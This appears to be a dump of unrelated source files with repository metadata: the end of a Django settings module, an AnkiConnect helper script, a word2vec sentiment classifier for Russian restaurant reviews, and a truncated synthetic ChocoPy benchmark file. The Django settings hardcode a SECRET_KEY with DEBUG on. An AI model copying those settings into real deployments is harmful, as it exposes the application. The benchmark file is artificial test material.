# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'vpri2)72sbh4z1+bm*#l10=g8%8-f#fk7+5n!q&!n+v@c@wx!d'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Currency',
'CurrencyExchangeRate',
'CurrencyPair',
'rest_framework'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'foreigncurrency.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'foreigncurrency.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'postgres',
'USER': 'postgres',
'HOST': 'db',
'PORT': 5432,
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
# REST_FRAMEWORK = {
# # Use Django's standard `django.contrib.auth` permissions,
# # or allow read-only access for unauthenticated users.
# 'DEFAULT_PERMISSION_CLASSES': [
# 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
# ]
# }
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10,
'PAGINATE_BY_PARAM': 'page_size',
'TEST_REQUEST_RENDERER_CLASSES': (
'rest_framework.renderers.MultiPartRenderer',
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.TemplateHTMLRenderer'
)
}
|
[
"if413061@gmail.com"
] |
if413061@gmail.com
|
9c2a49341bff6195b8066667d535d7894be629e7
|
e5b9aa2aeca511d36ea5c87b9fbbb8929b7d8f5b
|
/anki.py
|
20c0f250ca2aa6b3f7232cb140a05204394b2d56
|
[] |
no_license
|
ShinobuCR/anki-google-docs
|
763f91f12f7ce8f0f986256b6eaf6ce999172d29
|
40414e8d41cba0f4aa25d2edc3edb56dda9aa97e
|
refs/heads/master
| 2023-05-13T11:08:39.381755
| 2021-06-06T10:22:45
| 2021-06-06T10:22:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,000
|
py
|
import json
import requests
def add_note(front, back):
payload = {
"action": "addNote",
"version": 6,
"params": {
"note": {
"deckName": "Programming",
"modelName": "Basic",
"fields": {
"Front": "front content",
"Back": "back content"
}
}
}
}
payload['params']['note']['fields']['Front'] = front
payload['params']['note']['fields']['Back'] = back
    requests.post('http://localhost:8765', json.dumps(payload))
def update_note(note_id, front, back):
payload = {
"action": "updateNoteFields",
"version": 6,
"params": {
"note": {
"id": 1,
"fields": {
"Front": "front content",
"Back": "back content"
}
}
}
}
payload['params']['note']['id'] = note_id
payload['params']['note']['fields']['Front'] = front
payload['params']['note']['fields']['Back'] = back
    requests.post('http://localhost:8765', json.dumps(payload))
def find_notes():
payload = {
"action": "findNotes",
"version": 6,
"params": {
"query": "deck:Programming"
}
}
    response = requests.post('http://localhost:8765', json.dumps(payload))
return json.loads(response.content)['result']
def notes_info(note_id):
payload = {
"action": "notesInfo",
"version": 6,
"params": {
"notes": [note_id]
}
}
    response = requests.post('http://localhost:8765', json.dumps(payload))
return json.loads(response.content)['result']
def html_link(url):
return f'<a href="{url}">LINK</a>'
def embed_url(url):
return f'<embed height="800px" src="{url}" type="text/html" width="100%">'
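# Usage sketch (illustrative, not part of the original script): chains the helpers
# above against a local AnkiConnect instance on http://localhost:8765 with a
# "Programming" deck; the card text is an assumption, and the field access below
# assumes AnkiConnect's notesInfo response layout.
if __name__ == '__main__':
    add_note('What does WSGI stand for?', 'Web Server Gateway Interface')
    for note_id in find_notes():
        info = notes_info(note_id)[0]
        print(note_id, info['fields']['Front']['value'])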
|
[
"astepaniuk@tektelic.com"
] |
astepaniuk@tektelic.com
|
9dce25a25268b0696720b1ddd3a82be31b3a3856
|
d25dd793bbcb9f852b619a7a99d815f3406eae30
|
/NLP_Project_Sentiment_Classifier.py
|
61bd773d748d5127e5c09f0e80eb87f605f6b086
|
[] |
no_license
|
Shakurova/MachineLearningAlgorithms
|
e84c185aa7a9ca123c8f40367a0c40565b84de58
|
b8bf80e37112a4ea5e8732caa1a98c5c4e12f9a0
|
refs/heads/master
| 2020-06-11T22:15:49.255419
| 2017-03-22T14:17:59
| 2017-03-22T14:17:59
| 75,618,522
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,403
|
py
|
# -*- coding: utf-8 -*-
import re
import pandas as pd
import numpy as np
from lxml import etree
import pymorphy2
from nltk.tokenize import TreebankWordTokenizer
from stop_words import get_stop_words
import gensim
import matplotlib.pyplot as plt
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.base import TransformerMixin
from sklearn.naive_bayes import MultinomialNB
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report, f1_score, accuracy_score, confusion_matrix
from sklearn.pipeline import Pipeline
from sklearn.model_selection import StratifiedKFold, cross_val_score, train_test_split
from sklearn import cross_validation
"""
- Обучение:
Вытащить из корпуса все positive / negative слова
Векторизовать каждое слово с помощью word2vec
Написать простой классификатор (вектор - класс)
- Тестирование:
На вход поступает слово
Вектурезуем его с помощью word2vec и делаем predict
Краткий анализ результатов:
лучшие модели:
- dt при ruscorpora и .sample(frac=1)[:150]
- rt при web и .sample(frac=1)[:150]
- etx при web и .sample(frac=1)[:300]
"""
# Pre-trained model from RusVectores
m = 'web_0_300_20.bin' #'ruscorpora_1_300_10.bin' #
# Texts to label
# collocations_array = ['отвратительный', 'быстро', 'очень плохое обслуживание', 'отличное меню']
collocations_array = ['отличный выбор', 'не советуем', 'очень советуем', 'очень дорого', 'выше всяких похвал', 'в общем прекрасно', 'нам все понравилось', 'в целом ничего', 'отвратительный', 'быстро', 'очень плохое обслуживание', 'отличное меню', 'хороший', 'вкусный', 'замечательный', 'приятный', 'красивый', 'отличный']
# Enter the ground-truth answers
true = {'отличный выбор': 'positive',
'не советуем': 'negative',
'очень советуем': 'positive',
'очень дорого': 'negative',
'выше всяких похвал': 'positive',
'в общем прекрасно': 'positive',
'нам все понравилось': 'positive',
'в целом ничего': 'positive',
'отвратительный': 'negative',
'быстро': 'positive',
'очень плохое обслуживание': 'negative',
'отличное меню' : 'positive',
'хороший' : 'positive',
'вкусный' : 'positive',
'замечательный' : 'positive',
'приятный' : 'positive',
'красивый' : 'positive',
'отличный' : 'positive'}
morph = pymorphy2.MorphAnalyzer()
tokenizer = TreebankWordTokenizer()
RUS_LETTERS = u'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'
# POS tag mapping used in cleanization
transit = {'ADJF': 'ADJ',
'ADJS': 'ADJ',
'ADVB': 'ADV',
'COMP': 'ADV',
'CONJ': 'CCONJ',
'GRND': 'VERB',
'INFN': 'VERB',
'INTJ': 'INTJ',
'LATN': 'X',
'NOUN': 'NOUN',
'NPRO': 'PRON',
'NUMB': 'NUM',
'NUMR': 'NUM',
'PNCT': 'PUNCT',
'PRCL': 'PART',
'PRED': 'ADV',
'PREP': 'ADP',
'PRTF': 'ADJ',
'PRTS': 'VERB',
'ROMN': 'X',
'SYMB': 'SYM',
'UNKN': 'X',
'VERB': 'VERB'}
robj = re.compile('|'.join(transit.keys()))
def parse_xml(filename):
""" Парсинг входного корпуса"""
with open(filename, encoding='utf-8') as f:
xml = f.read()
dict = {}
text = []
category = []
sentiment = []
term = []
root = etree.fromstring(xml)
for child in root:
for aspect in child[3]:
if aspect.attrib['type'] == 'implicit' and aspect.attrib['sentiment']!= 'both' and aspect.attrib['sentiment']!= 'neutral':
text.append(child[2].text)
category.append(aspect.attrib['category'])
sentiment.append(aspect.attrib['sentiment'])
term.append(aspect.attrib['term'])
dict['text'] = text
dict['category'] = category
dict['sentiment'] = sentiment
dict['term'] = term
return dict
def cleanization(text):
    """Convert the input text into the format lemmatized_word_POS."""
    # 1. Lowercase all letters
    text_text = text.lower()
    # 2. Remove everything that is not a (Russian) letter
    letters_only = ''
    for _c in text_text:
        if _c in RUS_LETTERS:
            letters_only += _c
        else:
            letters_only += ' '
    # 3. Collapse repeated spaces
    while '  ' in letters_only:
        letters_only = letters_only.replace('  ', ' ')
    # 4. Tokenization
    word_list = tokenizer.tokenize(letters_only)
    # 5. Lemmatization
    clean_word_list = [morph.parse(word)[0].normal_form for word in word_list]  # lemmatization
    # 6. * Stop-word removal (optional) + appending part-of-speech tags
    # meaningful_words = [word for word in clean_word_list if word not in get_stop_words('ru')]  # stop words
    meaningful_words = [
        str(word) + '_' + robj.sub(lambda m: transit[m.group(0)], str(morph.parse(word)[0].tag.POS)) for word in
        clean_word_list]
    return ' '.join(meaningful_words)
def mean(a):
return sum(a) / len(a)
def word2vec_mean(text):
"""Усредняет вектор слов."""
arr = []
clean_text = cleanization(text)
    # look up the vector of every word in the text
for word in clean_text.split(' '):
        # the word may or may not be present in the model
if word in model:
arr.append(model[word])
if len(list(map(mean, zip(*arr)))) != 0:
return list(map(mean, zip(*arr)))
else:
return [0 for i in range(0, 300)]
class FunctionFeaturizer(TransformerMixin):
""" Для создания своего вектора я использовала усредненную векторизацию с помощью word2vec"""
def __init__(self):
pass
def fit(self, X, y=None):
return self
def transform(self, X):
fvs = []
        # fvs = word2vec_mean(X)  # if feeding individual words instead of a dataframe
for datum in X:
fv = word2vec_mean(datum)
fvs.append(fv)
return np.array(fvs)
if __name__ == '__main__':
text_train = parse_xml('SentiRuEval_rest_markup_train.xml')
text_test = parse_xml('SentiRuEval_rest_markup_test.xml')
    # Build one dataframe from the train and test corpora
df1 = pd.DataFrame(text_train)
df2 = pd.DataFrame(text_test)
frames = [df1, df2]
df = pd.concat(frames)
    # Balance the dataset
    df = pd.concat([df[df['sentiment'] == 'positive'].sample(frac=1)[:150], df[df['sentiment'] == 'negative']]).sample(frac=1)  # sampling choice (see docstring above)
    # Load the word2vec model
model = gensim.models.KeyedVectors.load_word2vec_format(m, binary=True)
model.init_sims(replace=True)
    # Split the corpus into train and test sets
X_train, X_test, y_train, y_test = train_test_split(df['term'], df['sentiment'], test_size=0.1)
def do_smth_with_model(data_train, class_train, data_test, class_test, steps):
"""Функция получает на взох данные и параметры для pipeline и печатает
результаты работы обучающей модели на тестовой выборке + возвращает pipeline"""
print('\nModel train')
pipeline = Pipeline(steps=steps)
cv_results = cross_val_score(pipeline,
data_train,
class_train,
cv=10,
scoring='accuracy',
)
print(cv_results.mean(), cv_results.std())
pipeline.fit(data_train, class_train)
class_predicted = pipeline.predict(data_test)
print(class_predicted)
print(classification_report(class_test, class_predicted))
return pipeline, class_predicted
    w2v_featurizer = FunctionFeaturizer()  # instantiate the custom vectorizer
# Word2Vec + LogisticRegression
print('\nCustom Transformer + LogisticRegression')
lr_pipeline, label_predicted = do_smth_with_model(X_train, y_train,
X_test, y_test,
steps=[('custom', w2v_featurizer),
('classifier', LogisticRegression())])
# Word2Vec + ExtraTreesClassifier
print('\nCustom Transformer + ExtraTreesClassifier')
etx_pipeline, label_predicted = do_smth_with_model(X_train, y_train,
X_test, y_test,
steps=[('custom', w2v_featurizer),
('classifier', ExtraTreesClassifier())])
# Word2Vec + RandomForestClassifier
print('\nCustom Transformer + RandomForestClassifier')
rf_pipeline, label_predicted = do_smth_with_model(X_train, y_train,
X_test, y_test,
steps=[('custom', w2v_featurizer),
('classifier', RandomForestClassifier())])
# Word2Vec + DecisionTreeClassifier
print('\nCustom Transformer + DecisionTreeClassifier')
dt_pipeline, label_predicted = do_smth_with_model(X_train, y_train,
X_test, y_test,
steps=[('custom', w2v_featurizer),
('classifier', DecisionTreeClassifier())])
    # Check how the models behave on our test collocations
def predictor(collocations_array, pipeline):
mistakes = 0
arr = []
df1 = pd.DataFrame({'text': collocations_array})
for i in df1.text:
arr.append(i)
с = 0
for i in pipeline.predict(df1.text):
print(arr[с], ':', i)
if true[arr[с]] != i:
mistakes += 1
с += 1
print(mistakes)
    # ENTER THE WORDS YOU WANT TO CHECK
predictor(collocations_array, etx_pipeline)
print('_'*30)
predictor(collocations_array, lr_pipeline)
print('_'*30)
predictor(collocations_array, rf_pipeline)
print('_'*30)
predictor(collocations_array, dt_pipeline)
|
[
"noreply@github.com"
] |
Shakurova.noreply@github.com
|
5746c95db3d1ff247776069f75e98382299337bc
|
007642d8c984efcaf6c294385c308834ac89c796
|
/Project 12.py
|
7fc5c2f89f5feb9182eb3f8faee65189f47dbf93
|
[] |
no_license
|
aluonimosi/PracticePython
|
3fdc5792ba7d4c61a298b9a0cd025235cbb9036f
|
fbfbd1aeee4681800c7c2816e4b4f4777d994e65
|
refs/heads/master
| 2020-03-21T02:05:23.829701
| 2019-02-16T06:54:29
| 2019-02-16T06:54:29
| 137,978,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 327
|
py
|
# Exercise 12
# Write a program that takes a list of numbers
# and makes a new list of only the first and last elements of the given list.
a = [5, 10, 15,15,2,5, 20, 25]
b=[]
b.append(a[0])
b.append(a[-1])
print (b)
# Inside a function
def first_and_last(a):
return [a[0], a[-1]]
first_and_last(a)
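# A minimal alternative sketch using iterable unpacking (added for illustration;
# assumes the list has at least two elements):
def first_and_last_unpacked(nums):
    first, *_, last = nums
    return [first, last]

print(first_and_last_unpacked(a))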
|
[
"noreply@github.com"
] |
aluonimosi.noreply@github.com
|
1686425f660c555065ece78d6555dfa097dc6be1
|
1ffaa803ef08794a25cd0f74f738222bcd9f7e76
|
/Python_Prog/while_loop.py
|
c12c55a6d485063e6c7e2bf1cffaca783ed49510
|
[] |
no_license
|
vysagh00/Python-programs
|
75d188809eb1ae78eeb59f377ef24a06d13a9337
|
c1b2b64115ebd46e91133109eb90dea60bd3a5b0
|
refs/heads/main
| 2023-08-26T12:34:00.783796
| 2021-10-28T16:59:40
| 2021-10-28T16:59:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 69
|
py
|
sum=0
i=0
while i<=10:
sum += i**3
i += 1
print(sum)
|
[
"noreply@github.com"
] |
vysagh00.noreply@github.com
|
57e0b43bd157f5140c109b02d53b65caeebdb426
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/sieve-big-7747.py
|
21059574743466a564b66ececa453e5f67f1165b
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 31,474
|
py
|
# A resizable list of integers
class Vector(object):
items: [int] = None
size: int = 0
def __init__(self:"Vector"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector", idx: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector") -> int:
return self.size
# A resizable list of integers
class Vector2(object):
items: [int] = None
items2: [int] = None
size: int = 0
size2: int = 0
def __init__(self:"Vector2"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector2") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector2") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector2", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector2", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector2", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector2", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector2", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector2", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector2", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector2", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector2") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector2") -> int:
return self.size
# A resizable list of integers
class Vector3(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
def __init__(self:"Vector3"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector3") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector3", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector3", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector3", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector3", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector3", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector3", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector3", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector3", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector3", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector3", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector3", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector3", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector3") -> int:
return self.size
# A resizable list of integers
class Vector4(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
def __init__(self:"Vector4"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector4") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector4", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector4", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector4", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector4", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector4", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector4", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector4", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector4", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector4", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector4", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector4", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector4", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector4") -> int:
return self.size
# A resizable list of integers
class Vector5(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
items5: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
size5: int = 0
def __init__(self:"Vector5"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity5(self:"Vector5") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity5(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector5", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector5", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector5", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector5", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append5(self:"Vector5", item: int, item2: int, item3: int, item4: int, item5: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector5", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector5", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all5(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int], new_items5: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
item5:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector5", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector5", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector5", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> object:
if idx < 0:
